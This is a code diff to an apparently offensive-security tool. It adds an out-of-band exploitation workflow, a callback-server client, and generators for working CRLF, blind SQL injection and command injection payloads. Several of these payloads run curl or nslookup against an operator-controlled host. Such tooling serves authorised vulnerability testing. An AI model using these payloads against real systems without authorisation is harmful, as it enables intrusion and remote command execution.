diff --git a/cyberai/agents/exploit/agent.py b/cyberai/agents/exploit/agent.py index 9be6f52..007160b 100644 --- a/cyberai/agents/exploit/agent.py +++ b/cyberai/agents/exploit/agent.py @@ -248,23 +248,25 @@ def run_oob(self, target: str) -> dict: self._log("phantom-grid not available — skipping OOB tests") return {"oob_available": False, "interactions": []} - iid = grid.new_interaction_id() + # v2.0 token-flow: mint a real server-side capture token. + token = grid.create_token(label=f"cyberai-{target}") or grid.new_interaction_id() grid_host = grid.base_url.replace("http://", "").replace("https://", "") console.print("[bold red][ExploitAgent] Generating OOB payloads...[/bold red]") - payloads = get_all_payloads(grid_host, iid) + payloads = get_all_payloads(grid_host, token) self._log("OOB payloads generated", {k: len(v) for k, v in payloads.items()}) console.print("[bold red][ExploitAgent] Polling phantom-grid...[/bold red]") - interactions = grid.get_interactions(iid) + interactions = grid.get_interactions(token) hits = [ {"protocol": i.protocol, "source_ip": i.source_ip, "timestamp": i.timestamp} for i in interactions ] - self._log(f"OOB callbacks: {len(hits)}", {"interaction_id": iid}) + self._log(f"OOB callbacks: {len(hits)}", {"token": token}) return { "oob_available": True, - "interaction_id": iid, + "token": token, + "capture_url": grid.capture_url(token), "payloads_generated": {k: len(v) for k, v in payloads.items()}, "payloads": payloads, "interactions": hits, diff --git a/cyberai/agents/exploit/oob_workflow.py b/cyberai/agents/exploit/oob_workflow.py new file mode 100644 index 0000000..3f98d3f --- /dev/null +++ b/cyberai/agents/exploit/oob_workflow.py @@ -0,0 +1,171 @@ +"""OOB exploitation workflow — pick payload, deliver, correlate callback (day 22). + +Ties phantom-grid v2.0 to CVE-driven exploitation: for a target vuln class, +mint a capture token, hand the caller a payload + capture URL to deliver, then +poll phantom-grid and correlate any callback back to the token. An optional LLM +turns a confirmed callback into a short analysis. + +Delivery is the caller's responsibility (deliver_fn), mirroring SSRFWorkflow / +XXEWorkflow — the workflow never blindly injects into a live target. +""" + +from __future__ import annotations + +import json +import logging +from dataclasses import dataclass, field +from typing import Any, Callable, Dict, List, Optional + +from cyberai.integrations.oob_payloads import get_all_payloads +from cyberai.integrations.phantom_grid import OOBInteraction, PhantomGridClient +from cyberai.integrations.phantom_grid_poller import PhantomGridPoller + +logger = logging.getLogger("cyberai.exploit.oob") + +# Map a coarse vuln class to the payload category produced by oob_payloads. +VULN_TO_CATEGORY = { + "ssrf": "ssrf", + "xxe": "xxe", + "rce": "cmdi", + "command_injection": "cmdi", + "cmdi": "cmdi", + "sqli": "sqli", + "sql_injection": "sqli", + "crlf": "crlf", + "ssti": "ssti", +} + + +@dataclass +class OOBFinding: + """Outcome of one OOB confirmation attempt.""" + + vuln_type: str + token: str + category: str + confirmed: bool + interaction: Optional[OOBInteraction] = None + payloads_tried: List[Dict[str, str]] = field(default_factory=list) + ai_analysis: str = "" + error: str = "" + + @property + def severity(self) -> str: + return "HIGH" if self.confirmed else "INFO" + + def to_dict(self) -> Dict[str, Any]: + return { + "vuln_type": self.vuln_type, + "token": self.token, + "category": self.category, + "confirmed": self.confirmed, + "source_ip": self.interaction.source_ip if self.interaction else "", + "protocol": self.interaction.protocol if self.interaction else "", + "payloads_tried": len(self.payloads_tried), + "ai_analysis": self.ai_analysis, + "error": self.error, + } + + +class OOBWorkflow: + """Orchestrates payload -> deliver -> correlate for one vuln class.""" + + def __init__( + self, + grid: Optional[PhantomGridClient] = None, + llm: Any = None, + poller: Optional[PhantomGridPoller] = None, + ): + self.grid = grid or PhantomGridClient() + self.llm = llm + # Poller owns wait_for_callback; default one shares the grid's base_url. + self.poller = poller or PhantomGridPoller(base_url=self.grid.base_url) + + def _grid_host(self) -> str: + return self.grid.base_url.replace("http://", "").replace("https://", "") + + def run( + self, + vuln_type: str, + deliver_fn: Callable[[Dict[str, str]], None], + label: str = "cyberai-oob", + ) -> OOBFinding: + """Mint a token, deliver each payload of the matching category, correlate. + + deliver_fn receives one payload dict and is responsible for sending it + to the target (HTTP param, body, header, etc.). Returns on first + confirmed callback or after all payloads are exhausted. + """ + category = VULN_TO_CATEGORY.get(vuln_type.lower(), "ssrf") + if not self.grid.available: + return OOBFinding( + vuln_type=vuln_type, + token="", + category=category, + confirmed=False, + error="phantom-grid unavailable", + ) + + token = self.grid.create_token(label=label) or self.grid.new_interaction_id() + payloads = get_all_payloads(self._grid_host(), token).get(category, []) + + tried: List[Dict[str, str]] = [] + for p in payloads: + tried.append(p) + try: + deliver_fn(p) + except Exception as exc: # noqa: BLE001 — delivery is caller code + logger.warning("OOB delivery failed: %s", exc) + continue + interaction = self.poller.wait_for_callback(token) + if interaction is not None: + finding = OOBFinding( + vuln_type=vuln_type, + token=token, + category=category, + confirmed=True, + interaction=interaction, + payloads_tried=tried, + ) + finding.ai_analysis = self._analyze(finding) + return finding + + return OOBFinding( + vuln_type=vuln_type, + token=token, + category=category, + confirmed=False, + payloads_tried=tried, + ) + + def correlate(self, token: str, interactions: List[OOBInteraction]) -> Optional[OOBInteraction]: + """Return the first interaction whose id matches the token.""" + for i in interactions: + if i.interaction_id == token or token in (i.payload or ""): + return i + return interactions[0] if interactions else None + + def _analyze(self, finding: OOBFinding) -> str: + """Optional LLM summary of a confirmed OOB callback.""" + if self.llm is None or finding.interaction is None: + return "" + system = ( + "You are an offensive security analyst. A blind vulnerability was " + "confirmed via an out-of-band callback. In 2-3 sentences, state the " + "vulnerability class, why the callback confirms it, and the impact." + ) + ctx = { + "vuln_type": finding.vuln_type, + "category": finding.category, + "protocol": finding.interaction.protocol, + "source_ip": finding.interaction.source_ip, + } + try: + return self.llm.call( + messages=[{"role": "user", "content": json.dumps(ctx)}], + system=system, + agent_name="exploit-oob", + ) + except Exception as exc: # noqa: BLE001 — analysis is best-effort + logger.warning("OOB LLM analysis failed: %s", exc) + return "" diff --git a/cyberai/core/config.py b/cyberai/core/config.py index 4df6f76..581afd5 100644 --- a/cyberai/core/config.py +++ b/cyberai/core/config.py @@ -21,7 +21,7 @@ class LLMConfig: @dataclass class PhantomConfig: intel_db: Path = Path("~/.phantom/intel.db") - grid_url: str = "http://127.0.0.1:8080" + grid_url: str = "http://127.0.0.1:9090" grid_api_key: Optional[str] = field(default_factory=lambda: os.getenv("PHANTOM_GRID_KEY")) diff --git a/cyberai/integrations/oob_payloads.py b/cyberai/integrations/oob_payloads.py index 7e55855..8c2bc86 100644 --- a/cyberai/integrations/oob_payloads.py +++ b/cyberai/integrations/oob_payloads.py @@ -1,6 +1,9 @@ """ -OOB payload generator — SSRF / XXE / SSTI / RCE templates. -Each payload embeds a unique interaction_id for phantom-grid tracking. +OOB payload generator — SSRF / XXE / SSTI / RCE / CRLF / SQLi / CMDi templates. + +Each payload embeds a unique interaction_id (phantom-grid token) for tracking. +HTTP callbacks target the v2.0 capture endpoint: http:///c/. +DNS callbacks use .. """ from typing import Dict, List @@ -8,7 +11,7 @@ def generate_ssrf_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]: """HTTP/DNS SSRF payloads pointing to phantom-grid.""" - base = f"{grid_host}/{interaction_id}" + base = f"{grid_host}/c/{interaction_id}" dns = f"{interaction_id}.{grid_host}" return [ { @@ -36,7 +39,7 @@ def generate_ssrf_payloads(grid_host: str, interaction_id: str) -> List[Dict[str def generate_xxe_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]: """Blind XXE payloads with OOB DNS/HTTP exfil.""" - url = f"http://{grid_host}/{interaction_id}" + url = f"http://{grid_host}/c/{interaction_id}" return [ { "type": "xxe_oob_http", @@ -107,7 +110,7 @@ def generate_ssti_payloads() -> List[Dict[str, str]]: def generate_rce_oob_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]: """OOB RCE confirmation payloads via DNS/HTTP callback.""" - url = f"http://{grid_host}/{interaction_id}" + url = f"http://{grid_host}/c/{interaction_id}" return [ { "type": "rce_curl", @@ -132,6 +135,96 @@ def generate_rce_oob_payloads(grid_host: str, interaction_id: str) -> List[Dict[ ] +def generate_crlf_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]: + """CRLF / HTTP header injection with OOB callback confirmation.""" + cb = f"http://{grid_host}/c/{interaction_id}" + return [ + { + "type": "crlf_header_inject", + "payload": f"%0d%0aLocation:%20{cb}", + "description": "CRLF — inject Location header redirect to phantom-grid", + }, + { + "type": "crlf_response_split", + "payload": ( + f"%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/c/{interaction_id}%20HTTP/1.1" + ), + "description": "CRLF — response splitting with embedded callback path", + }, + { + "type": "crlf_set_cookie", + "payload": f"%0d%0aSet-Cookie:%20oob={interaction_id}", + "description": "CRLF — Set-Cookie injection marker", + }, + ] + + +def generate_sqli_oob_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]: + """Blind SQLi OOB exfiltration — Oracle / MSSQL / MySQL / PostgreSQL.""" + http = f"http://{grid_host}/c/{interaction_id}" + dns = f"{interaction_id}.{grid_host}" + return [ + { + "type": "sqli_oracle_utl_http", + "payload": f"' || UTL_HTTP.REQUEST('{http}') || '", + "description": "Oracle OOB via UTL_HTTP.REQUEST", + }, + { + "type": "sqli_oracle_dns", + "payload": (f"' || (SELECT DBMS_LDAP.INIT('{dns}',80) FROM DUAL) || '"), + "description": "Oracle OOB DNS via DBMS_LDAP.INIT", + }, + { + "type": "sqli_mssql_xp_dirtree", + "payload": f"'; EXEC master..xp_dirtree '\\\\{dns}\\x'; --", + "description": "MSSQL OOB via xp_dirtree UNC path (SMB/DNS)", + }, + { + "type": "sqli_mysql_load_file", + "payload": f"' UNION SELECT LOAD_FILE(CONCAT('\\\\{dns}\\a')) -- -", + "description": "MySQL OOB via LOAD_FILE UNC (Windows)", + }, + { + "type": "sqli_pg_copy_program", + "payload": f"'; COPY (SELECT '') TO PROGRAM 'curl {http}'; --", + "description": "PostgreSQL OOB via COPY TO PROGRAM", + }, + ] + + +def generate_cmdi_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]: + """Command injection OOB — separators with HTTP/DNS callback.""" + http = f"http://{grid_host}/c/{interaction_id}" + dns = f"{interaction_id}.{grid_host}" + return [ + { + "type": "cmdi_backtick", + "payload": f"`curl {http}`", + "description": "CMDi via backtick substitution", + }, + { + "type": "cmdi_dollar_paren", + "payload": f"$(curl {http})", + "description": "CMDi via $() substitution", + }, + { + "type": "cmdi_pipe", + "payload": f"| curl {http}", + "description": "CMDi via pipe", + }, + { + "type": "cmdi_semicolon", + "payload": f"; curl {http}", + "description": "CMDi via semicolon separator", + }, + { + "type": "cmdi_dns_newline", + "payload": f"%0anslookup {dns}", + "description": "CMDi via newline + DNS lookup", + }, + ] + + def get_all_payloads(grid_host: str, interaction_id: str) -> Dict[str, List[Dict[str, str]]]: """Return all payload categories keyed by type.""" return { @@ -139,4 +232,7 @@ def get_all_payloads(grid_host: str, interaction_id: str) -> Dict[str, List[Dict "xxe": generate_xxe_payloads(grid_host, interaction_id), "ssti": generate_ssti_payloads(), "rce": generate_rce_oob_payloads(grid_host, interaction_id), + "crlf": generate_crlf_payloads(grid_host, interaction_id), + "sqli": generate_sqli_oob_payloads(grid_host, interaction_id), + "cmdi": generate_cmdi_payloads(grid_host, interaction_id), } diff --git a/cyberai/integrations/phantom_grid.py b/cyberai/integrations/phantom_grid.py index 000313e..2239cb3 100644 --- a/cyberai/integrations/phantom_grid.py +++ b/cyberai/integrations/phantom_grid.py @@ -1,18 +1,39 @@ """ -phantom-grid client — OOB callback tracking. +phantom-grid client — OOB callback tracking (v2.0 API). https://github.com/evkir/phantom-grid + +Real phantom-grid v2.0 contract: + POST /api/tokens -> create a capture token + GET /api/tokens//interactions -> interactions for a token + GET /api/poll?since= -> new interactions (all tokens) + GET /health -> health check + HTTP capture endpoint: http://:9090/c/ + DNS capture endpoint: . + +Default HTTP port is 9090 (v2.0), not 8080. """ -import httpx +from __future__ import annotations + +import os import uuid -from typing import Optional, List, Dict, Any from dataclasses import dataclass, field from datetime import datetime, timezone -import os +from typing import Any, Dict, List, Optional + +import httpx + +DEFAULT_GRID_URL = "http://127.0.0.1:9090" @dataclass class OOBInteraction: + """A single captured OOB callback. + + `timestamp` is kept as a string (ISO or epoch-as-str) to stay provider + agnostic; `confirmed` mirrors the legacy poller's semantics. + """ + interaction_id: str protocol: str # dns | http | https source_ip: str @@ -20,21 +41,30 @@ class OOBInteraction: payload: str = "" data: Dict[str, Any] = field(default_factory=dict) + @property + def confirmed(self) -> bool: + return bool(self.source_ip) + class PhantomGridClient: - """ - Client for phantom-grid OOB interaction server. - Registers payloads, polls for callbacks. + """Client for the phantom-grid v2.0 OOB interaction server. + + Creates capture tokens, builds capture URLs, polls for callbacks. """ - def __init__(self, base_url: str = None, api_key: str = None, timeout: int = 10): - self.base_url = (base_url or os.getenv("PHANTOM_GRID_URL", "http://127.0.0.1:8080")).rstrip( - "/" - ) + def __init__( + self, + base_url: Optional[str] = None, + api_key: Optional[str] = None, + timeout: int = 10, + ): + self.base_url = (base_url or os.getenv("PHANTOM_GRID_URL", DEFAULT_GRID_URL)).rstrip("/") self.api_key = api_key or os.getenv("PHANTOM_GRID_KEY", "") self.timeout = timeout self._available: Optional[bool] = None + # ── health ──────────────────────────────────────────────────────── + @property def available(self) -> bool: if self._available is None: @@ -55,22 +85,51 @@ def _headers(self) -> Dict[str, str]: headers["X-API-Key"] = self.api_key return headers + # ── tokens ──────────────────────────────────────────────────────── + def new_interaction_id(self) -> str: - """Generate unique ID for tracking a specific payload.""" + """Generate a local fallback id (used when the server is unavailable). + + Prefer create_token() against a live server; this exists for offline + payload generation and backward compatibility. + """ return str(uuid.uuid4()).replace("-", "")[:16] + def create_token(self, label: str = "cyberai", notes: str = "") -> Optional[str]: + """POST /api/tokens -> token id. None if the server is unavailable.""" + if not self.available: + return None + try: + with httpx.Client(timeout=self.timeout) as client: + r = client.post( + f"{self.base_url}/api/tokens", + json={"label": label, "notes": notes}, + headers=self._headers(), + ) + r.raise_for_status() + body = r.json() + # Server may return {"id": ...} or {"token": ...} + return str(body.get("id") or body.get("token") or "") or None + except Exception: + return None + + def capture_url(self, token: str, scheme: str = "http") -> str: + """Build the HTTP(S) capture URL for a token: /c/.""" + base = self.base_url + if scheme == "https" and base.startswith("http://"): + base = base.replace("http://", "https://") + return f"{base}/c/{token}" + + # ── interactions ────────────────────────────────────────────────── + def get_interactions(self, interaction_id: str) -> List[OOBInteraction]: - """ - Poll phantom-grid for callbacks matching interaction_id. - Returns list of OOBInteraction objects. - """ + """GET /api/tokens//interactions -> parsed interactions.""" if not self.available: return [] try: with httpx.Client(timeout=self.timeout) as client: r = client.get( - f"{self.base_url}/api/interactions", - params={"id": interaction_id}, + f"{self.base_url}/api/tokens/{interaction_id}/interactions", headers=self._headers(), ) r.raise_for_status() @@ -79,13 +138,18 @@ def get_interactions(self, interaction_id: str) -> List[OOBInteraction]: except Exception: return [] - def list_all(self) -> List[OOBInteraction]: - """Fetch all recent interactions from phantom-grid.""" + def poll(self, since: Optional[str] = None) -> List[OOBInteraction]: + """GET /api/poll?since= -> new interactions across all tokens.""" if not self.available: return [] + params = {"since": since} if since else {} try: with httpx.Client(timeout=self.timeout) as client: - r = client.get(f"{self.base_url}/api/interactions", headers=self._headers()) + r = client.get( + f"{self.base_url}/api/poll", + params=params, + headers=self._headers(), + ) r.raise_for_status() items = r.json().get("interactions", []) return [self._parse(i) for i in items] @@ -94,10 +158,10 @@ def list_all(self) -> List[OOBInteraction]: def _parse(self, raw: Dict) -> OOBInteraction: return OOBInteraction( - interaction_id=raw.get("id", ""), + interaction_id=raw.get("id", "") or raw.get("token", ""), protocol=raw.get("protocol", "unknown"), source_ip=raw.get("source_ip", ""), - timestamp=raw.get("timestamp", datetime.now(timezone.utc).isoformat()), + timestamp=str(raw.get("timestamp", datetime.now(timezone.utc).isoformat())), payload=raw.get("payload", ""), data=raw.get("data", {}), ) diff --git a/cyberai/integrations/phantom_grid_poller.py b/cyberai/integrations/phantom_grid_poller.py index 3c594cc..ff6a446 100644 --- a/cyberai/integrations/phantom_grid_poller.py +++ b/cyberai/integrations/phantom_grid_poller.py @@ -1,95 +1,57 @@ """ -phantom-grid result poller for ExploitAgent. -Polls OOB interaction callbacks after payload delivery. +phantom-grid result poller — thin compatibility shim over PhantomGridClient. + +Historically this module had its own client + OOBInteraction. It now delegates +to the single PhantomGridClient (v2.0 API) so there is one endpoint contract +and one OOBInteraction type. The public API (wait_for_callback, +get_interactions) is preserved for ssrf_workflow / xxe_workflow. """ -import time -import httpx -import logging -from dataclasses import dataclass, field -from typing import Optional +from __future__ import annotations -logger = logging.getLogger("cyberai.integrations.phantom_grid_poller") +import logging +import time +from typing import List, Optional +from cyberai.integrations.phantom_grid import OOBInteraction, PhantomGridClient -@dataclass -class OOBInteraction: - interaction_id: str - protocol: str # "dns" | "http" | "https" - source_ip: str - timestamp: float - payload: str = "" - raw: dict = field(default_factory=dict) +logger = logging.getLogger("cyberai.integrations.phantom_grid_poller") - @property - def confirmed(self) -> bool: - return bool(self.source_ip) +# Re-export so existing `from ...phantom_grid_poller import OOBInteraction` works. +__all__ = ["OOBInteraction", "PhantomGridPoller"] class PhantomGridPoller: - """ - Polls phantom-grid for OOB interaction callbacks. - Used by ExploitAgent to confirm blind vulnerabilities. - """ + """Polls phantom-grid for OOB callbacks. Delegates to PhantomGridClient.""" def __init__( self, - base_url: str = "http://127.0.0.1:8080", + base_url: str = "http://127.0.0.1:9090", api_key: Optional[str] = None, poll_interval: float = 2.0, max_wait: float = 30.0, ): - self.base_url = base_url.rstrip("/") - self.api_key = api_key self.poll_interval = poll_interval self.max_wait = max_wait + self._client = PhantomGridClient(base_url=base_url, api_key=api_key) - def _headers(self) -> dict: - h = {"Content-Type": "application/json"} - if self.api_key: - h["X-API-Key"] = self.api_key - return h - - def get_interactions(self, interaction_id: str) -> list[OOBInteraction]: - """Fetch all captured interactions for a given ID.""" - try: - resp = httpx.get( - f"{self.base_url}/api/interactions/{interaction_id}", - headers=self._headers(), - timeout=10, - ) - resp.raise_for_status() - data = resp.json() - return [self._parse(i) for i in data.get("interactions", [])] - except httpx.HTTPError as e: - logger.warning(f"phantom-grid poll failed: {e}") - return [] + def get_interactions(self, interaction_id: str) -> List[OOBInteraction]: + """Fetch all captured interactions for a given token/id.""" + return self._client.get_interactions(interaction_id) def wait_for_callback(self, interaction_id: str) -> Optional[OOBInteraction]: - """ - Block until OOB callback received or max_wait exceeded. - Returns first interaction or None on timeout. - """ + """Block until an OOB callback arrives or max_wait is exceeded.""" elapsed = 0.0 while elapsed < self.max_wait: interactions = self.get_interactions(interaction_id) if interactions: logger.info( - f"OOB callback received: {interaction_id} from {interactions[0].source_ip}" + "OOB callback received: %s from %s", + interaction_id, + interactions[0].source_ip, ) return interactions[0] time.sleep(self.poll_interval) elapsed += self.poll_interval - - logger.warning(f"No OOB callback within {self.max_wait}s for {interaction_id}") + logger.warning("No OOB callback within %.0fs for %s", self.max_wait, interaction_id) return None - - def _parse(self, data: dict) -> OOBInteraction: - return OOBInteraction( - interaction_id=data.get("id", ""), - protocol=data.get("protocol", "unknown"), - source_ip=data.get("source_ip", ""), - timestamp=data.get("timestamp", 0.0), - payload=data.get("payload", ""), - raw=data, - ) diff --git a/tests/integration/test_oob_ssrf.py b/tests/integration/test_oob_ssrf.py new file mode 100644 index 0000000..d989203 --- /dev/null +++ b/tests/integration/test_oob_ssrf.py @@ -0,0 +1,145 @@ +"""Day 22 — OOB SSRF detection, mocked end-to-end against phantom-grid v2.0.""" + +from __future__ import annotations + +from unittest.mock import MagicMock + +from cyberai.agents.exploit.oob_workflow import OOBFinding, OOBWorkflow +from cyberai.integrations.phantom_grid import OOBInteraction, PhantomGridClient + + +def _grid(token: str, *, available: bool = True) -> MagicMock: + """A mock PhantomGridClient (no wait_for_callback — that lives on poller).""" + grid = MagicMock(spec=PhantomGridClient) + grid.available = available + grid.base_url = "http://grid.local:9090" + grid.create_token.return_value = token + grid.capture_url.return_value = f"http://grid.local:9090/c/{token}" + grid.get_interactions.return_value = [] + return grid + + +def _poller(interaction): + """A mock poller whose wait_for_callback yields the given interaction.""" + from cyberai.integrations.phantom_grid_poller import PhantomGridPoller + + poller = MagicMock(spec=PhantomGridPoller) + poller.wait_for_callback.return_value = interaction + return poller + + +def _callback(token: str) -> OOBInteraction: + return OOBInteraction( + interaction_id=token, + protocol="http", + source_ip="10.10.10.5", + timestamp="2026-06-12T00:00:00Z", + payload=f"/c/{token}", + ) + + +# ── confirmed path ──────────────────────────────────────────────────── + + +def test_ssrf_confirmed_via_callback(): + token = "tok_ssrf_1" + grid = _grid(token) + wf = OOBWorkflow(grid=grid, poller=_poller(_callback(token))) + + delivered = [] + finding = wf.run("ssrf", deliver_fn=lambda p: delivered.append(p)) + + assert isinstance(finding, OOBFinding) + assert finding.confirmed is True + assert finding.severity == "HIGH" + assert finding.category == "ssrf" + assert finding.token == token + assert finding.interaction.source_ip == "10.10.10.5" + # delivery was actually attempted before the callback confirmed + assert len(delivered) >= 1 + + +def test_ssrf_confirmed_stops_at_first_callback(): + token = "tok_ssrf_2" + grid = _grid(token) + wf = OOBWorkflow(grid=grid, poller=_poller(_callback(token))) + + delivered = [] + wf.run("ssrf", deliver_fn=lambda p: delivered.append(p)) + # first payload already triggers a callback -> only one delivery + assert len(delivered) == 1 + + +# ── not-confirmed path ──────────────────────────────────────────────── + + +def test_ssrf_not_confirmed_when_no_callback(): + grid = _grid("tok_none") + wf = OOBWorkflow(grid=grid, poller=_poller(None)) + + delivered = [] + finding = wf.run("ssrf", deliver_fn=lambda p: delivered.append(p)) + + assert finding.confirmed is False + assert finding.severity == "INFO" + # all ssrf payloads attempted, none confirmed + assert len(delivered) == len(finding.payloads_tried) >= 1 + + +# ── grid unavailable ────────────────────────────────────────────────── + + +def test_ssrf_grid_unavailable(): + grid = _grid("tok_x", available=False) + wf = OOBWorkflow(grid=grid, poller=_poller(None)) + + finding = wf.run("ssrf", deliver_fn=lambda p: None) + assert finding.confirmed is False + assert finding.error == "phantom-grid unavailable" + grid.create_token.assert_not_called() + + +# ── delivery failure tolerated ──────────────────────────────────────── + + +def test_ssrf_delivery_exception_continues(): + token = "tok_err" + grid = _grid(token) + wf = OOBWorkflow(grid=grid, poller=_poller(None)) + + def boom(_payload): + raise RuntimeError("target unreachable") + + finding = wf.run("ssrf", deliver_fn=boom) + # workflow swallows delivery errors and finishes unconfirmed + assert finding.confirmed is False + + +# ── LLM analysis on confirm ─────────────────────────────────────────── + + +def test_ssrf_confirmed_triggers_llm_analysis(): + token = "tok_llm" + grid = _grid(token) + llm = MagicMock() + llm.call.return_value = "SSRF confirmed: HTTP callback proves server-side fetch." + wf = OOBWorkflow(grid=grid, llm=llm, poller=_poller(_callback(token))) + + finding = wf.run("ssrf", deliver_fn=lambda p: None) + assert finding.confirmed is True + assert "SSRF confirmed" in finding.ai_analysis + llm.call.assert_called_once() + + +# ── correlate ───────────────────────────────────────────────────────── + + +def test_correlate_matches_token(): + wf = OOBWorkflow(grid=_grid("tok_x"), poller=_poller(None)) + i = _callback("tok_x") + assert wf.correlate("tok_x", [i]) is i + + +def test_correlate_empty_returns_none(): + wf = OOBWorkflow(grid=_grid("tok_x"), poller=_poller(None)) + assert wf.correlate("tok_x", []) is None diff --git a/tests/unit/test_phantom_grid.py b/tests/unit/test_phantom_grid.py index 5ba6d78..b25462f 100644 --- a/tests/unit/test_phantom_grid.py +++ b/tests/unit/test_phantom_grid.py @@ -113,7 +113,7 @@ def test_rce_payloads_contain_curl_and_wget(): def test_get_all_payloads_keys(): all_p = get_all_payloads("grid.example.com", "abc123") - assert set(all_p.keys()) == {"ssrf", "xxe", "ssti", "rce"} + assert set(all_p.keys()) == {"ssrf", "xxe", "ssti", "rce", "crlf", "sqli", "cmdi"} def test_get_all_payloads_non_empty():